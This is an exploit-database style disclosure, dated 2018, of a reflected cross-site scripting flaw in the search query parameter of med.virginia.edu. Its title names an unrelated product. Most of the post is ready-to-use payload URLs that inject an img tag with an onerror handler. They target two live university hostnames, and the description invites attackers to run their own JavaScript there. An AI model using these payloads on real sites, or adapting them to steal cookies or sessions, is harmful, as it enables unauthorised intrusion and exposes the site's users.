# Exploit title: casio - Cross Site Scripting ( XSS ) Vulnerability
# Date: 2018-03-19
# Exploit Author: Elsfa7-110 ( https://www.facebook.com/elsfa7110 )
Vendor Homepage: https://med.virginia.edu/
# Category: Web Application
# Dork: N/A
# =============================
# Description:
# I discovered a XSS vulnerability in med.virginia.edu This vulnerability allows bad guy executes javascript commands on
# target. In this target, attacker can enter his javascript command through url. like this :
# http://Server/?cx=009548005491705796603%3AWMX1307513326&q="><img src=https://pbs.twimg.com/profile_images/805910513037221888/HqPIq7-A_400x400.jpg onerror=prompt("Elsfa7-110");>
#============================= Demo :
https://med.virginia.edu/?cx=009548005491705796603%3AWMX1307513326&q="><img src=https://pbs.twimg.com/profile_images/805910513037221888/HqPIq7-A_400x400.jpg onerror=prompt("Elsfa7-110");>
================
https://technology.med.virginia.edu/?cx=009548005491705796603%3AWMX1307513326&q="><img src=https://pbs.twimg.com/profile_images/805910513037221888/HqPIq7-A_400x400.jpg onerror=prompt("Elsfa7-110");>
